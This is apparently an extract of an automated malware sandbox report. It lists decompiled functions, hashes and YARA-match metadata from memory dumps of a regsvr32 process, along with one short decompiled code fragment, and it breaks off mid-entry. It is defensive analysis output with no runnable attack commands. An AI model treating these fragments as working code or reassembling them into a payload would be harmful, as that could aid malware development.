                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: uS$J
                                                                                                • API String ID: 0-437994327
                                                                                                • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                • Instruction ID: 1ce228b0cfa9813743cf27bcf6c0bf8cf49702ff025c7f76aeb22f23eae1a472
                                                                                                • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                • Instruction Fuzzy Hash: 3A31D7B190034E8FDB84CF64C88A5DE7FB0FF28358F104619E859A6260D3B89695CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F50A70 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +@$`.P
                                                                                                • API String ID: 0-1189405855
                                                                                                • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                                • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F43CF4 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ^$R
                                                                                                • API String ID: 0-3595634639
                                                                                                • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                                • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F42FD4 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: t^$w
                                                                                                • API String ID: 0-1486493484
                                                                                                • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                                • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F51924 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #
                                                                                                • API String ID: 0-606707520
                                                                                                • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                • Instruction ID: 1f292d33c5d9ded8f96421762096b996a085c69e8e17c29299c65111ab5ed876
                                                                                                • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                • Instruction Fuzzy Hash: 01223770D14709EFDB58DFA8C49A59EBBF1FF44348F00816DE80AAB290D7749A19CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180008D28 Relevance: 1.6, APIs: 1, Instructions: 149COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
				return __rdx + 0xb;
			}






                                                                                                0x180008d28
                                                                                                0x180008d2d
                                                                                                0x180008d32
                                                                                                0x180008d56
                                                                                                0x180008d5d
                                                                                                0x180008d70
                                                                                                0x180008d91

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                • Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
                                                                                                • Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                • Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F51030 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ef
                                                                                                • API String ID: 0-3522424648
                                                                                                • Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                • Instruction ID: 3695dd7ca703f485978d244a3dce06a9734b614b9e66a4c0f1c675e52f7ae903
                                                                                                • Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                • Instruction Fuzzy Hash: 90021870A04709EFDB58DF68C08999EBBF2FF44314F00816DE84AAB250D775DA59CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4EF14 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: x]!-
                                                                                                • API String ID: 0-585868058
                                                                                                • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                • Instruction ID: c0caf49efaf4e7b6b8b85a917690f4cead46df9ee068c3eb0936d78760157e49
                                                                                                • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                • Instruction Fuzzy Hash: 86D189B1A0060DCFDBA8CF78C54A5DD7BF1BB48308F606129E826AA2B6D7749905CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5A8B0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: }^O
                                                                                                • API String ID: 0-3039680174
                                                                                                • Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                • Instruction ID: 53642538cb77d7bae0fb869666aee9711a64a4427383f787048f353d2d520192
                                                                                                • Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                • Instruction Fuzzy Hash: F6A17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F54D20 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RH
                                                                                                • API String ID: 0-2975065227
                                                                                                • Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                • Instruction ID: 3e9ea7abd6ddf5187d2892a095e774ea9f9f31c9cc8157a9a0ed80b7046413ee
                                                                                                • Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                • Instruction Fuzzy Hash: 87513B7111C7448FC7A8DF18D4C66AAB7E0FB84310F90991DE8CEC7251DF74A88A9B46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4BE90 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Y
                                                                                                • API String ID: 0-579211002
                                                                                                • Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                • Instruction ID: ab86133c36dcd50802e65f4dd796bf16f81dc050f1e4dd5322194aefc575fb52
                                                                                                • Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                • Instruction Fuzzy Hash: 4751D4715107898BDB98DF28C88A0DD3BA1FB4935CF425318ED8EA62A1D77CD849CB49
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4D6CC Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: vOs
                                                                                                • API String ID: 0-1852020951
                                                                                                • Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                • Instruction ID: 543ea1e47959c2442f87695b277c3bd73096d774c1a58750ca28aa6f5263c2c4
                                                                                                • Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                • Instruction Fuzzy Hash: 0E618EB190030E8FDB49CF68D48A5CE7FB0FB64398F204519F845A6260D7B996A4CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4461C Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *)
                                                                                                • API String ID: 0-1811957435
                                                                                                • Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                • Instruction ID: a0a17fb8510f5e028abc751411bc9e1a88d0ba78354b6a8ab8093c3a6431f09f
                                                                                                • Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                • Instruction Fuzzy Hash: 9F31953061CB888FC728DF29D08556ABBE0FB99301F50472EE98AC7365DB74D805CB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4F77C Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: t
                                                                                                • API String ID: 0-1935021737
                                                                                                • Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                • Instruction ID: 0778e4714d20bafc8421ccf47dc3d5cc009554136eeaa9536c52203ae55d573d
                                                                                                • Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                • Instruction Fuzzy Hash: 72319F3061DB448FE768DF2CD48516ABBE0FB96351F104A6DE9CAC7266D770D809CB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F6181C Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: __
                                                                                                • API String ID: 0-2267946753
                                                                                                • Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                • Instruction ID: 93bfbf45f17b85160e326040b6397c7c2a175f458ae3cf35a4bd5e3b51d9cb2d
                                                                                                • Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                • Instruction Fuzzy Hash: 7141F07050CB848BE758DF29C58A41ABBF1FBC9304F500A2DF69A87360C775D845CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F49408 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: GSn
                                                                                                • API String ID: 0-1733515909
                                                                                                • Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                • Instruction ID: 7e2b542015367d43299f0e2840bb6bcd5f07d8657efae5042f5f1f2eb10e55c5
                                                                                                • Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                • Instruction Fuzzy Hash: FE51D6B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F68500 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8=
                                                                                                • API String ID: 0-237953557
                                                                                                • Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                • Instruction ID: 55e089b965d29060f69b03517f06cc44f090e693f79d0378968c15596d7509ef
                                                                                                • Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                • Instruction Fuzzy Hash: F2314930608B458BDB5CDF2CD49922ABAE1FBD9340F444A2EF58AD7365DB34D845CB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F520E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: K
                                                                                                • API String ID: 0-425913083
                                                                                                • Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                • Instruction ID: 88ac6e9e56aeae0fcb5bf5df5982007eba3b451921d2a4425eec00035a5a4480
                                                                                                • Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                • Instruction Fuzzy Hash: 8841F7B180438ECFDB48CF68D8865DE7BB0FB58344F114A19F866A6250D3B8D665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F508CC Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: t"
                                                                                                • API String ID: 0-2131657386
                                                                                                • Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                • Instruction ID: 36d53832c6f9a7caf578cc6a3a6c2fc1132eb59a751205c614d9bd4c2723c004
                                                                                                • Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                • Instruction Fuzzy Hash: BB41E77180070D8BDF48DF64C48A0DE7FB0FB083A8F65621DE91AB6290D3B89585CF99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F53CD4 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: gLv
                                                                                                • API String ID: 0-1669999040
                                                                                                • Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                • Instruction ID: 0bfcdb268aba54e7961a9f14f1050a9e6a0e778082ccd11b295b4716e1d0ff7c
                                                                                                • Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                • Instruction Fuzzy Hash: 9241B0B180078E8FDF84CF64C88A4DE7BB0FB18358F104619F866A6290D3B89665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F418DC Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 2|
                                                                                                • API String ID: 0-4112153497
                                                                                                • Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                • Instruction ID: de1df218c1e16543bbbfeb007247a8c9561616116d6de820abf10d60c9a7b67f
                                                                                                • Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                • Instruction Fuzzy Hash: 2831E2715083808FD768DF28C58A54BBBF1FBC6704F50891DE6CA8A260DB76D849CB03
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F64E8C Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: v)v
                                                                                                • API String ID: 0-2248367734
                                                                                                • Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                • Instruction ID: 406f7a9d7ebbe22d4eb3c54054534ba3458e77760000bd4b01ba55a4239761b8
                                                                                                • Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                • Instruction Fuzzy Hash: F731FFB0D107189BDF88DFB8D98A4DDBBF0BB48308F50826DD816B6290D7785A45CF68
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5A244 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: b
                                                                                                • API String ID: 0-1908338681
                                                                                                • Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                • Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
                                                                                                • Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                • Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4D33C Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Y
                                                                                                • API String ID: 0-579211002
                                                                                                • Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                • Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
                                                                                                • Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                • Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F50E2C Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0}
                                                                                                • API String ID: 0-2955618701
                                                                                                • Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                • Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
                                                                                                • Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                • Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F498AC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6N
                                                                                                • API String ID: 0-1503784733
                                                                                                • Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
